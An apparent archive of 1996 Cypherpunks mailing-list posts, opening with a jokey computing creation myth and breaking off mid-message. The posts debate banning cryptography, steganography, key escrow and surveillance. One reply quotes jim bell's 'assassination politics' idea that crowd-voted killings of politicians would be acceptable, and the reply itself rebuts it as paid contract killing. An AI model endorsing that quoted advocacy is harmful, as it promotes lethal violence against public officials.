> So Brian and Dennis started playing, and they created C. God saw C,
> and saw that it was good. So he decided to let Brian and Dennis play
> some more.
>
> Then Brian and Dennis created Unix. God saw Unix, and he was jealous.
> So he created Bill to torment Brian and Dennis and obscure their
> creation (for God could not destroy Unix, for he secretly admired
> its perfection).
>
> So Bill created Microsoft. And Microsoft created Windows. And God saw
> that it was bad, but it had market share, so he was happy. Then Bill
> got cocky, and his ego got bigger than God's. So to knock Bill down a
> couple of pegs, God put into effect, a wondrous plan.
>
> First God created Tim. And Tim created the World Wide Web (using
> Unix, of course). This was good, but not THAT good. So God created
> Marc. Marc created Mosaic (using  Unix, of course). Mosaic created a
> huge feeding frenzy that has got a lot of people who are reading this
>  their jobs.
>
>  But that's a different story. Mosaic was good, and God saw it was
>  good, so he allowed Marc to start Netscape. Back to this later.
>
>  But all this time Brian and Dennis started to make something better
>  than Unix called Plan 9 (because God was successful in foiling Brian
>  and Dennis' previous seven plans [there was no Plan 8 because Brian
>  and Dennis pulled the wool over God's eyes and just jumped to Plan 9,
>  which was too bright a move for even God to figure out.] )
>
>  Eventually, God figured out how to create Larry.
>
>  No one knows how or why he created Larry, except perhaps to reduce
>  productivity at the Jet Propulsion Labs at NASA. [Rumors are that God
>  created Larry because he secretly liked what Dennis and Brian had done
>  with C, but didn't think C and Unix was enough -- this probably isn't
>  true because God believed he had destroyed Brian and Dennis' plans by
>  destroying Plans 1-7, and by creating Microsoft to slay their beloved
>  Unix.
>
>  Anyhow, Larry created Perl (using Unix and C, of course), and God saw
>  it was good, so he made Randal. Larry and Randal wrote books about
>  Perl. And everyone saw that this was good, except snobs who were too
>  much into C, Windows, and Intel. (It so happens that Randal was so
>  cool he figured out a way to break into Unix at Intel, and Intel sued
>  him for it but that's another story also -- chances are Randal would
>  not have been able to break into *Plan 9* at Intel, but Intel isn't
>  cool enough to be running Plan 9)
>
>  Anyhow, back to Randal. So Randal and Larry wrote books, but they had
>  to be nice because of the people they worked for. So then came Tom.
>  But back to Tom later.
>
>  Anyhow, God saw Netscape (made using Unix and C, of course), and he
>  saw it was good, and that annoyed Bill quite a bit. And that made Him
>  very happy, and made Marc very rich. But Bill was very very rich. But
>  that's a *completely* different story.
>
>  But as good as Larry's creation, Perl, was, it couldn't do everything,
>  so God created Scott. Scott announced Java, and this was big news.  Now
>  Java really pissed Bill off, because Bill also created Blackbird, and
>  Java killed Blackbird. This was bad because killing Blackbird also
>  meant killing the Microsoft Network. And many rejoiced over that, but
>  that, too is another story.
>
>  Now Java, obviously had done much to annoy Bill. For Java was so good
>  that Bill had to license Java. All this time, Scott poked lots of fun
>  at Bill because Sun, which was where Scott worked, made a better OS,
>  derived -- of course -- from Unix, which was better than Bill's and
>  Microsoft's Windows.
>
>  Anyhow, even God's creations Steve and Steve who created Apple
>  couldn't make Bill license the much superior MacOS. But finally, Bill
>  had to license Java. So justice was served, and Bill's ego was served
>  him on a platter for him to eat his words. Or something. That part is
>  unclear.
>
>  So by this time Windows and Microsoft and Bill in general really
>  sucked. Especially considering the advantages that Brian and Dennis'
>  C and Unix, running Marc's Netscape and Mosaic over Tim's World Wide
>  Web, doing cool CGI stuff with Larry's Perl, which you learned from
>  Randal and Tom, and got to program with Scott's Java.
>
>  And God realized he had put Bill down too far. So then God made it so
>  that Marc's Netscape and Mosaic could run on Windows. We already know
>  that Bill had to license Java from Scott. We know that Bill missed
>  the boat for not beating Tim to the punch on the World Wide Web. The
>  last straw was for God to make it possible for Larry's Perl to run on
>  Bill's Windows.
>
>  So back to Tom. Tom was a Perl God. And God didn't like this, but
>  Tom's a God so there isn't much God could do, so He couldn't stop Tom
>  from saying things like "install an operating system on your poor
>  lonely computer the way God and Dennis intended", and "Espousing the
>  eponymous /cgi-bin/perl.exe?FMH.pl execution model is like reading a
>  suicide note -- three days too late."
>
>  The moral to the story? God is fickle. That's why Microsoft and Bill
>  and Windows exists. Do what God intended, install C, Unix,
>  Mosaic/Netscape, Java, and Perl on your system, and make Brian,
>  Dennis, Larry, Tim, Tom, Randal, Scott, and even Steve and Steve,
>  I'm sure, happy by doing so.
>
>  Oh yeah, Linus was cool too. He's the guy you thank for being able to
>  run all the cool stuff on your crappy little Pee Cee. (anything with
>  x86 on it, by default, is crappy, no PERSONAL flames intended)
>
>
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 21:07:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b02aea834cd835d@[192.0.2.1]>
Message-ID: <v03007802aea86e3be000@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:16 PM -0800 11/7/96, Peter Hendrickson wrote:

>While the term "police state" is not well defined, I do not believe it
>applies to what I am describing.  (There is a risk that it could develop,
>however.)
>
>Laws forbidding the use of cryptography have ominous free speech
>implications as we would be attempting to outlaw concealed meaning.
>Concealed meaning can be pretty well concealed and that makes
>for difficult and dangerous legal questions.

If the only means of detection is raiding homes to inspect them for
contraband--something not even done during the height of the anti-drug
hysteria, at least not on a regular basis--then I stand by my comment that
stopping private use of cryptography requires a police state such as the
world has not yet seen.

>On the other hand, the action of running a program which uses forbidden
>crypto systems is pretty unambiguous and could be effectively isolated
>from other kinds of speech.

Oh? How? If the output of such a program looks like quantization or Johnson
noise in a recording, then how could this form of "speech" be effectively
isolated?


>Many kinds of speech are already illegal.  For instance, I am not allowed
>to copy somebody else's speech because it would violate copyright laws.
>I am not allowed to break verbal contracts.  In essence, I am punished
>later for the something I said if I am forced to keep my word.  But,
>this does not constitute a police state.

Careful! Some of your examples are not examples of _prohibited_ speech, but
are instead examples of _actionable_ speech. The Constitution is fairly
clear that the government cannot be a filter or censor for speech.

Hence, requirements that people speak in English, or in some other language
that the government can understand, is not required. Not even in a criminal
case, as a matter of fact. (If I speak only Skansko-Bravatlian, and am the
only such speaker in the world, I cannot be compelled to study English or
even Spanish prior to a trial.)

Requiring people to speak or write in a language that is understandable to
some GS-10 at Fort Meade would appear to violate the First Amendment in a
rather serious way. As encrypted speech is really just another language
(tell me I'm wrong on this, anyone), encrypted speech appears to be fully
protected by the First Amendment, which says that Congress shall make no
law about speech, blah blah.


>What I am proposing would not require an end to fair trials or warrants
>or really any other legal customs we have.

I strongly disagree. Prosecution would involve making certain _forms_ of
speech illegal (not the same thing as the _content_ being illegal, as in
ordering the kililng of another, or treason, or shouting "Fire!"
improperly). And detection and collection of evidence would almost
certainly involve illegal searches and seizures.

>In case anybody has any doubts, and I doubt Tim does, the existence of
>a life sentence does not imply the presence of a police state.

Not ipso facto, but having people serving life sentences for speaking in an
outlawed language certainly meets my definition of a police state.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 21:12:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Judge Patel Background
Message-ID: <v02140b0eaea86df4f191@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Jim McCoy pointed me to an interesting book called "The Courage
of Their Convictions" by Peter Irons.  It just happens to
reference Judge Patel.

Fred Korematsu was a Japanese-American shipyard worker in the
early 1940s. His fiancee was Caucasian.  To stay with her, he evaded
the concentration camps for two months, but was caught and convicted
anyway.  His conviction was not reversed until 1983 in the court of one
Judge Patel.

Page 48, "After hearing lawyers on both sides, Judge Marilyn Patel
asked Fred Korematsu to address the court.  `As long as my record
stands in federal court,' he quietly stated, `any American citizen
can be held in prison or concentration camps without a trial or
hearing.'  Ruling from the bench, Judge Patel labeled the government's
position as `tantamount to a confession of error' and erased Fred's
conviction from the court's records."

(Judge Patel is presiding over Dan Bernstein's challenge to the ITAR.)

(Full reference: Irons, Peter "The Courage of Their Convictions:
Sixteen Americans Who Fought Their Way to the Supreme Court"
New York: Penguin Books, 1990  ISBN 0 14 01.2810 7)

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 7 Nov 1996 21:37:50 -0800 (PST)
To: Jim Ray <jmr@shopmiami.com>
Subject: Re: Who owns cypherpunks [RANT]
In-Reply-To: <199611071940.OAA83990@osceola.gate.net>
Message-ID: <3282C1BA.68CB@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray wrote:
> Jim Choate writes:
> > There is one important legal aspect which the operator of the Cypherpunks
> > mailing list has opened themselves up for with this action. In short they
> > have now opened themselves up for defamation and liable suites by imposing
> > an editorial policy on the contents of this list (1).

> I fear you mean "libel," and I think not. (see below.)

[multi-snip]

> I'm sure John's quaking in his boots. Reread my campground analogy, and try
> to refute it. You can't. Go start your own list with no moderation. Go start
> a more moderated list than John's, like Perry's will be. Do whatever, but
> this moronic thread must end!

[more snip]

Ironic, isn't it?  Jim says "this moronic thread *must* end", and yet, this very list
that is John's *private* property is filling up with rants about censorship.  Tsk tsk.

Maybe next time they'll make it more apparent at subscription time that there's no
assurance of free speech here!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 21:30:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <Pine.LNX.3.94.961107043646.339A-100000@random.sp.org>
Message-ID: <v03007803aea873ff3acc@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM -0800 11/7/96, Dale Thorn wrote:

>According to HP, the "Polish" part of the term comes from a Polish
>mathematician whose
>name (I can't spell it, and I don't have the .DOC) is pronounced phonetically:
>WOOCASHEVITZ.  The "reverse" part apparently means the inventor specified the
>operation before the parameters, instead of how HP implemented it.


Lucaciewicz, as I recall. His notation was originally that one would add
two numbers, a and b, as "+ a b." A modified form, adapted for stack
machines, was to add two numbers with "a b +." Hence, _reverse_ Polish
notation, but equally sound.

This involves entering a, then pushing it onto the stack with an ENTER,
then entering b, then hitting the "+" key to pop the stack and place the
sum in the main (X) register.

For people who claim that (6 + 7) * 5 is the "natural" way to do things, I
point out to them that the way one does it one's head is to take 6 and 7
and add them then to multiply by 5. Or I show them

   6
+  7
-----
   13
*   5
-----
   65

Then they see that RPN is actually the way we do things in our head. Or on
paper.

Computers do things with parentheses, we don't.

By the way, Polish notation is how LISP evaluates expressions. E.g.

(+ 6 7)

or, for the full problem above,

(* 5 (+ 6 7))

And for those of you are not LISP or Scheme fans, the language FORTH also
uses Polish notation. RPN, in fact.



--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Thu, 7 Nov 1996 18:37:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Information [for new PGP user]
In-Reply-To: <3281FB84.3560@gte.net>
Message-ID: <Pine.OSF.3.91.961107213057.8220G-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 7 Nov 1996, Dale Thorn wrote:

> stewarts@ix.netcom.com wrote:
> > >> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
[snip] 
> > You can read and compile the source code yourself.
> 
> [snip, snip]
> 
> Really?  All 60,000 or so lines, including all 'includes' or attachments?
> 
> I'll bet you can't find 10 out of 1,000 users who have read the total source,
> let alone comprehended and validated it.

the point is that the source code is available and public.  I may not be 
able to find any errors or hiddens trapdoors in it, but I have greater 
trust in it because many other people can read it and make public 
comments about it.   the advantage of a published (public) work is that 
even those of us who are not experts can gain the advantage of having the 
work reviewed openly by anyone who is so inclined.
--
to unsubscribe from the cypherpunks mailing list, send to
     majordomo@toad.com
a message that states: 
     unsubscribe cypherpunks
in the message body, not the subject line.  This is the preferred method. 
You may also try the Vulis method, but it irritates so many people.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 21:40:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <199611080116.RAA17853@mail.pacifier.com>
Message-ID: <v03007804aea877ef27a6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM -0800 11/7/96, jim bell wrote:


>accessible to the common man?  Suppose, say, the approval of one million
>citizens was the only thing necessary to have an assassination legally
>accomplished?   Or, more likely in practice, the vote of a million citizens
>was interpreted as a kind of terminal veto over that particular politician
>or government employee, who would have to resign or face the (lethal)
>consquences!  In that case, assassinations wouldn't be seen as bad, they'd
>be the natural consequence of a politician who overstays his welcome and
>ignores numerous warnings.

Nothing in any version of AP I have seen makes any stipulation that the
payment is "one person, one vote."

Thus, if saw a politician killed (and if I believed it to be an AP-related
kiling), I might think:

"Well, one hundred thousand people just voted with their one dollar each to
have him killed."

But I might just as easily think:

"Or one special interest group just paid one hundred thousand dollars to
have him killed."

That is, "assassination politics" boils down to be being a minor variant on
a well-established topic: the use of untraceable payments for contract
killings. Whether there was some fiction of a betting market or just a
direct payment is immaterial.

--Tim May





"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Thu, 7 Nov 1996 21:52:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?Re: Why is cryptoanarchy irreversible?
In-Reply-To: <Pine.OSF.3.95.961107154908.14910A-100000@rottweiler.cslab.vt.edu>
Message-ID: <199611080552.VAA04741@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, Daniel T. Hagan wrote:

> On Thu, 7 Nov 1996, Peter Hendrickson wrote:
> 
> > It appears to be widely believed that cryptoanarchy is irreversible.
> > Everybody believes that the race to deploy or forbid strong cryptography
> > will define the outcome for a long time.
> > 
> > I can't think of a reason why this should be so.
> > 
> > If the wide use of strong cryptography results in widely unpopular
> > activities such as sarin attacks and political assassinations, it
> > would not be all that hard to forbid it, even after deployment.
> > 
> > I am curious why many people believe this is not true.
> > 
> > Peter Hendrickson
> > ph@netcom.com

Look around at all the laws in a community that are unenforceable and 
largely ignored by significant sections of the community. Taxes are a 
classic with many people receiving cash and not declaring it..I suppose 
you could say they just opt not to pay taxes while law abiders (to varying 
degrees) opt in to pay tax. 

It is estimated here where all dogs, for example, are required to be 
registered, that only 40 percent are in fact registered (ie pay the dog 
tax). The authorities simply do not, with their current technology, have 
the ability or political will to break down everyone's front door and 
complete house to house dog searches then deal with court cases and bring 
eveidence as to the actual owner of the animal where this is a relevant 
matter to be proved.

Take a look at the nearest road and tell me if the speed limit imposed is 
effective enough to have everyone comply.

Dare I mention drugs, political corrutpion, fraud, or murder.

Once the tools are 'out' individuals decide whether they will use them, 
irrespective of what laws may be made to control or ban useage. Certainly 
those laws will have an impact on individuals decisions as to whether the 
risk of use, after taking into account the penalty, and importantly the 
likelihood of detection, will warrant its use.

Consider the difficulty of actually outlawing say PGP and making it 
stick. To ban its use on a network compliance measures such as routine 
traffic scanning would be implimented. So users may say resort to direct 
modem to modem systems thus forcing authorities to routinely tap 
telephone calls, identify modem calls, and analyse these calls. The 
authorities start to use scarce resources provided by those members of 
the public that choose to pay taxes to them. These taxpayers may start to 
get annoyed that resources are being used to do this when it makes no 
difference to their lives. Even if these measures were successful you 
could print your pgp output out to paper, post it to your friend, and she 
could scan it on her computer and decrypt it. The authorities now have to 
start opening mail and implimenting effective means of identifying the 
poster of all mail in the community to ensure compliance. If you posted a 
disk they would need to consume resources routinely scanning every disk 
for encrypted data..imagine the thousands of jobs that would create..and 
the costs to the poor taxpayer of implimenting such a scheme. The public 
starts to get even more annoyed. In fact some members of the public who 
previously didn't give a damn about the crypto nuts now start to sympathise 
with them.

The authorities have to spend even more resources on publicity and scams 
to align privacy advocates with terrorists. Some privacy advocates may 
even become terrorists who before didn't really care for such tactics.

Assume the snail mail route is effectively sqaushed what then? Well you 
could voice call your friend and read the encyphered text to them over 
the phone and they could then run it through pgp and decrypt it. If the 
authorities effectively made this too costly (in terms of risk etc) then 
you could always just jump on a plane and tell them the message 
personally or send someone else to do that for you.

The costs of compliance increase as the authorities take measures to put 
the genie back in the bottle. Stealth versions of popular programs get 
released, and further technological advances are made so that the problem 
becomes greater with respect to compliance as do the costs to the 
taxpayer of ensuring compliance. Encrypted data that cannot be easily 
distinguished form noise would require routine analysis and attempted 
cracking of every bit of data transmitted..a task that would soon bring 
even the great US economy to its knees assuming the people didn't put a 
stop to the madness before it reached that point.

Just as an aside, I am sure the various spook angencies in the 'free 
world' are well aware of these issues and no doubt other issues I have 
not imagined and such considerations have played a part in so far stalling 
an outright ban on the use of effective encryption programs and devices. 
There are always costs to a government in the reduction in freedoms, and 
the ultimate cost to any particular government is that it may stir the 
beast so much that it awakens and takes away that governments authority 
whether by democratic means or otherwise.

> If I understand the reasoning, people beleive it is easier to prevent the
> release of strong crypto. techiniques than to remove them once they are
> released.  
> 
> Once a terrorist has strong crypto, why should they stop using it if it
> becomes illegal?
> 
> Daniel

Or even ordinary mortals...just a thought for consideration :).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 21:51:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b04aea83f2ff40e@[192.0.2.1]>
Message-ID: <v03007805aea879c094e9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:55 PM -0800 11/7/96, Peter Hendrickson wrote:
>At 5:13 PM 11/7/1996, Jim McCoy wrote:
>> Getting a program to recognize a subliminal message channel is even
>> harder than teaching a human to do so, check out the book Disappearing
>> Cryptography or do a web search for "mimic functions" to see how easy it
>> is to hide messages in text which a program parses as regular English.
>> The other problem is that more and more of the data being tossed around
>> the net are images and sound files in which it is incredibly easy to
>> hide encrypted messages.
>
>I doubt it is as easy as you say.  Truly noisy sources are unusual.
>You don't have to be 100% sure you have a crypto-terrorist on your hands
>to search their house, interrogate them, and talk for awhile to
>everyone they know and then watch them carefully from then on.

"Truly noisy sources" are not at all unusual. Actually, the hard part is
ever proving a source is _not_ noisy. (There are deep issues involving
randomness here, and I usually go into the work of Kolmogorov, Chaitin, and
others at this point. Consult the archives, or see a book on information
theory.)

As Jim noted, any reasonably good crypto algorithm will produce an output
which so closely resmbles noise (modulo the issue of "Begin PGP" tags,
which can, and should, be removed) as to foil any efforts to prove it is
not noise.

The legal issue is this: can we pass laws and have them upheld by the
courts which impose severe penalties on people for the supposed crime of
having in their possession sequences of numbers which cannot be converted
to meaningful English sentences? I maintain that the Constitution says we
cannot. Of course, if the Constitution is thrown out, then the old
Cypherpunk joke may come into play: "Use a random number, go to jail." (An
Eric Hughes quote, from 1992-3.)


>In the model I am positing, there would be broad popular support for
>such policies.

I think you are assuming a lot.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry Iskandar" <ebrandt@idola.net.id>
Date: Thu, 7 Nov 1996 07:07:06 -0800 (PST)
To: <Cypherpunks@toad.com>
Subject: No Subject
Message-ID: <9611071510.AA19421@merak.idola.net.id>
MIME-Version: 1.0
Content-Type: text/plain


Please unsubcribe me from your list

Creating Place
Medan - Indonesia
ebrandt@idola.net.id




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 23:06:45 -0800 (PST)
To: "Mark M." <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b11aea877091410@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 PM 11/7/1996, Mark M. wrote:
>On Thu, 7 Nov 1996, Peter Hendrickson wrote:
>> If mandatory GAK were imposed, reviewing messages is easy, even with
>> inter-agency fighting.  Or, encryption in general could just be
>> forbidden if GAK created too much hassle.
>
> How would this be possible?  The latest GAK proposal is for companies to store
> keys instead of the government.  There is the potential for colaboration
> between a TLA and an "escrow" company.  It is also possible for a TLA to
> illegally obtain the keys from the company's database.  However, it would
> still be impossible to review every message.  Even if the government had full
> access to all encryption keys, it would still be technically infeasible to
> review every message.

The latest GAK proposal is not under discussion.  What is under discussion
is the policy options that are possible when there is strong public
support to suppress strong cryptography.  The Four Horsemen scenario
would likely generate such mass support, even among cypherpunks.

>> In practice I suspect that good stego is hard.  You don't have to be
>> right every time when you look for it, just some of the time.  When
>> you see packets that seem kind of funny to you, the judge issues you
>> a warrant and you search the suspect's house and computer very carefully.
>> If stego is in use, the software that generated it can be found.  Then
>> you hand out a life sentence.

> Good stego is possible.  Stegoing data in jpegs is very secure and probably
> infeasible to detect.

I am not convinced, but I am not expert in this area.

> However, I find the life sentence idea pretty unrealistic.  You are assuming
> that there will be wide support for tough restrictions on crypto.  This is
> not currently the case and I doubt it would ever get to this point.

Yes, I am assuming that the Four Horsemen scenario would stimulate strong
public support for extraordinarily tough restrictions on crypto.

Yes, I doubt it would ever get to this point because cryptoanarchy will
be far less dramatic than many people believe.  It may cause dramatic
changes, but they will be subtle and gradual, like the Net's influence.

For instance, I don't think Ruby Ridge would ever have been an issue
raised in Congress if it hadn't been for the Internet.  This is a subtle
and positive change, but most people hardly noticed the effect of the Net.

The way in which the agenda is set has moved out of New York and Washington.
Strong cryptography promotes this because it enables people to discuss
issues which are important to them without fear of retribution.

> Not very many people are currently supporting any life sentence for anyone
> who is in possession of explosives, despite the increase in terrorist
> activity.  Gun-control advocates aren't supporting laws that will give a life
> sentence to anyone who owns a gun.  Given that many people who believe in
> gun-control and tagants in explosives are against GAK, why do you think there
> will be such a revolt against strong crypto?

I don't think that there will be a strong revolt against crypto.  From the
point of view of the GAKers that's a problem.  That is why they have to
act before the public discovers it's an asset, not a liability.

But, if the GAKers are right about the Four Horsemen scenario (which
I doubt they believe themselves) there would be great public support
for drastic measures and these measures could be quite effective.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 23:10:15 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b12aea8799caeb0@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:43 PM 11/7/1996, Timothy C. May wrote:
>At 2:24 PM -0800 11/7/96, Peter Hendrickson wrote:
>>> If I understand the reasoning, people beleive it is easier to prevent the
>>> release of strong crypto. techiniques than to remove them once they are
>>> released.
>>
>> The reasons underlying this are what I don't completely understand.
>>
>>> Once a terrorist has strong crypto, why should they stop using it if it
>>> becomes illegal?
>>
>> Use of strong crypto would be a tip off that one is a terrorist.
>>
>> If strong cryptography were unpopular and highly illegal, very few
>> people would be using it.  This makes it easy to identify suspects.
>
> * Identification of high-entropy traffic (putatively: encrypted traffic)
> would require extensive surveillance, tapping, and whatnot. The
> infrastructure for this does not exist, and would cost an enormous amount
> to deploy.

This could be financed by taxing routers, computers, modems, leased
lines, and the like.  The fraction of the total cost of communications
equipment would be minimal.

> * (This is why so many of us want a crackdown on crypto delayed for as long
> as possible: every year that passes means more networks, more intranets,
> more channels, more modes, etc. Satellites, fibers, etc.)

But, in the face of near unanimous belief that strong cryptography must
be stopped, this would not matter.  Most of the operators of this
equipment would be eager to help.

> * High-entropy traffic does not mean encryption, either. And encrypted
> traffic can be twiddled to look like lower-entropy traffic (and I don't
> even mean steganography, I mean adjusting message statistics).

I'm not sure I entirely understand this, but I am as skeptical of
this as I am of reasonably high bandwidth stegonography operated
over several years.  I think this is a real hard problem, especially
if 100% accuracy is not required.

> * Once crypto has become widespread, and is built into mailers, browsers,
> etc., there will be many people already using those old mailers and
> browsers. Throwing Mom and Pop in jail because they forgot to turn off the
> PGP mode in Eudora 4.0 or Netscape 5.0 is not going to go over well, even
> in an era of supposed "zero-tolerance." (And California and Arizona just
> voted to effectively decriminalize pot..."medical use of encryption" on the
> 2005 ballot?)

You are proposing a likely scenario: large numbers of people think there's
nothing wrong with a little encryption now and then.  But, that is not
the scenario I am discussing.  I am discussing the Four Horsemen scenario
where terrible things are enabled by the wide deployment of strong
cryptography.

Most of us would accept greater surveillance and some restrictions of
our liberties if we believed that our lives and fortunes were endangered.

In this environment, you might have a three month grace period for
people to change to legitimate tools.  Then the police would probably
practice a certain amount of discretion.  If they catch Mom or Pop
with a pre-ban crypto program, they'll bring them in and give them
a good talking to, and then let them go.

After a year or two you prosecute.  Mom and Pop will get with the program.

Violators will be seen as being quite irresponsible, regardless of age.

> * Steganography. Entire volumes can be written about this. I believe I was
> the first to propose, in a 1988-89 series of articles on sci.crypt, the use
> of LSBs in image and sound files to transmit huge amounts of information,
> with detection very difficult. As I told Kevin Kelley--reported in his
> "Whole Earth Review" article and in his excellent "Out of Control" book--a
> single DAT tape of a musical recording can easily carry 150-200 MB of
> "message" just in the LSBs!

I strongly suspect that there are patterns in how sensors function
and in real tapes.  They may be subtle.  The government need not reveal
any particular knowledge of these patterns.  All they have to do is
set up a series of labs, each of which is expert in one kind of known
pattern.  When studying a suspect's communications - or tape - the
information gets passed through these labs.  If any of the labs flags
the data as suspicious, a search warrant is issued.  The prosecution
is then based on evidence that the search warrant turned up so the
stego need never be introduced into court.

> Unless all tapes are checked at the border--and what are live tapes, with
> lots of noise in the bottom few bits of each word--to be compared against?
> The mind boggles at the task.

There's no reason why we have to allow live tapes to cross borders
without some questioning and explanations.  Iran did this for many
years when they were trying to keep the Ayatollah's speeches out.
It didn't work, of course, but it did not have popular support, either.

> * "Legitimate needs." The whole notion Peter raises of banning cryptography
> is fraught with problems. Are businesses to be told that all communications
> are to be in the clear? Or is Peter's point that some form of GAK will be
> used?

My point is that the government can do whatever it needs to do if there
is strong public support.  If it is too expensive to decrypt even
GAK'ed communications, then it may be made illegal to encrypt anything.

I am inclined to think that even in the Four Horsemen scenario, the
government would prefer GAK'ed communications because it gives them
greater leverage.  People speak more freely when they think not everybody
can hear what they are saying.

Somebody brought up the Catholic church's custom of confessionals
a few weeks ago and suggested that it was a powerful political
tool.  (Sorry I can't remember who said this.)  I am sure this
is the case.  The priests don't even have to break their vows of
secrecy for this to be the case - they simply summarize the results.

Had the early Christian custom of public confessional been followed,
the Church would have had far less political power.  Of course, once
somebody has confessed deep secrets to you for years, they will be
reluctant to push their luck to far when opposing you.

> (If the latter, then of course we are back to an even better form of
> "stego" than stego itself: superencrypt before using GAK. Unless the
> government samples packets randomly and does what they say they will do to
> open a GAKked packet--e.g., get a court order, go to the escrow key
> holders, etc.--then how will they know if a message is superencrypted? And
> what if a GAKked message contains conventional _codes_? Are shorthand codes
> such as business have long used--"The rain in Rome is warm this month"--to
> be illegal?)

There is no reason at all to assume that the government will get warrants.
For instance, maybe a warrant only applies to people and not to machines.
So, the court could decide - if it were so inclined - that it was not
a violation of the Bill of Rights to automatically scan messages for
suspicious looking material so long as the material itself was not
revealed without a warrant.  Then the results obtained could be used
to justify a warrant, reading of the material by human agents, and
the further issue of more warrants.  To make this convenient they could
even keep a judge in the basement.

> * The point being that "rogue crypto" (terrorists, crypto anarchists,
> freedom fighters) gets lost on the blizzard of other uses. And shutting
> down all crypto means shutting down business use of crypto to protect
> secrets, and probably means an end to digital commerce.

No, GAK does not mean an end to digital commerce or an end to secure
business communications.  It just means that you have to register
with the government for a cryptography license which gives you a
unique public key to use to encrypt your keys for the government's
use.  If the license costs $1000 for ten years that should cover
the costs.  Companies which are terribly worried about compromise
